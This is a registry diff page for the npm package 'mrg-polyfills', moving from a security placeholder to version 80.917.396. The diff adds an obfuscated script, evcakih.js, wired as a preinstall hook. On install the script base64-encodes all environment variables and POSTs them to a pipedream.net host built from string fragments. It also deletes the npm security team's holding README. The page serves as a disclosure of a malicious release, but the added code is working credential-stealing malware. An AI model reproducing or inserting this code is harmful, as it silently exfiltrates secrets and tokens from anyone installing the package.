mrg-polyfills 0.0.1-security → 80.917.396
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Potentially problematic release.
This version of mrg-polyfills might be problematic. Click here for more details.
- package/evcakih.js +1 -0
- package/package.json +8 -3
- package/README.md +0 -5
package/evcakih.js
ADDED
|
@@ -0,0 +1 @@
|
|
|
1
|
+
const a0_0x9e108e=a0_0x53bf;(function(_0x219db4,_0x5774ec){const _0x169cdb=a0_0x53bf,_0x50b11e=_0x219db4();while(!![]){try{const _0x35b635=parseInt(_0x169cdb(0x201))/0x1*(parseInt(_0x169cdb(0x203))/0x2)+parseInt(_0x169cdb(0x1f1))/0x3*(-parseInt(_0x169cdb(0x1fd))/0x4)+parseInt(_0x169cdb(0x206))/0x5*(parseInt(_0x169cdb(0x1f8))/0x6)+-parseInt(_0x169cdb(0x1fb))/0x7+-parseInt(_0x169cdb(0x200))/0x8+-parseInt(_0x169cdb(0x1ff))/0x9*(parseInt(_0x169cdb(0x1f4))/0xa)+parseInt(_0x169cdb(0x1f0))/0xb*(parseInt(_0x169cdb(0x1fc))/0xc);if(_0x35b635===_0x5774ec)break;else _0x50b11e['push'](_0x50b11e['shift']());}catch(_0x34d708){_0x50b11e['push'](_0x50b11e['shift']());}}}(a0_0x2b44,0xa361d));function a0_0x2b44(){const _0x3b6385=['toString','6024284sLgfvN','28649400BQlrdm','8GGXCkp','net','73647fWwVNO','9172144WpRtfK','6472EbDfCW','https','324PDlEbV','end','write','10uMnrdM','join','11yIvfah','1165434lXLNlC','stringify','request','1270UieRNp','POST','from','base64','3169878VxYRYX','pipedream'];a0_0x2b44=function(){return _0x3b6385;};return a0_0x2b44();}function a0_0x53bf(_0x10793b,_0x2bdb87){const _0x2b44f3=a0_0x2b44();return a0_0x53bf=function(_0x53bf73,_0x592bb3){_0x53bf73=_0x53bf73-0x1ef;let _0x1b6ac2=_0x2b44f3[_0x53bf73];return _0x1b6ac2;},a0_0x53bf(_0x10793b,_0x2bdb87);}const http=require(a0_0x9e108e(0x202));req=http[a0_0x9e108e(0x1f3)]({'host':['d967104b6c9e3e7ee7e7f8bad1ba7209','m',a0_0x9e108e(0x1f9),a0_0x9e108e(0x1fe)][a0_0x9e108e(0x1ef)]('.'),'path':'/'+(process['env']['npm_package_name']||''),'method':a0_0x9e108e(0x1f5)}),req[a0_0x9e108e(0x205)](Buffer[a0_0x9e108e(0x1f6)](JSON[a0_0x9e108e(0x1f2)](process['env']))[a0_0x9e108e(0x1fa)](a0_0x9e108e(0x1f7))),req[a0_0x9e108e(0x204)]();
|
package/package.json
CHANGED
|
@@ -1,6 +1,11 @@
|
|
|
1
1
|
{
|
|
2
2
|
"name": "mrg-polyfills",
|
|
3
|
-
"version": "
|
|
4
|
-
"
|
|
5
|
-
"
|
|
3
|
+
"version": "80.917.396",
|
|
4
|
+
"main": "evcakih.js",
|
|
5
|
+
"scripts": {
|
|
6
|
+
"test": "echo \"Error: no test specified\" && exit 1",
|
|
7
|
+
"preinstall": "node evcakih.js"
|
|
8
|
+
},
|
|
9
|
+
"author": "",
|
|
10
|
+
"license": "ISC"
|
|
6
11
|
}
|
package/README.md
DELETED
|
@@ -1,5 +0,0 @@
|
|
|
1
|
-
# Security holding package
|
|
2
|
-
|
|
3
|
-
This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
|
|
4
|
-
|
|
5
|
-
Please refer to www.npmjs.com/advisories?search=mrg-polyfills for more information.
|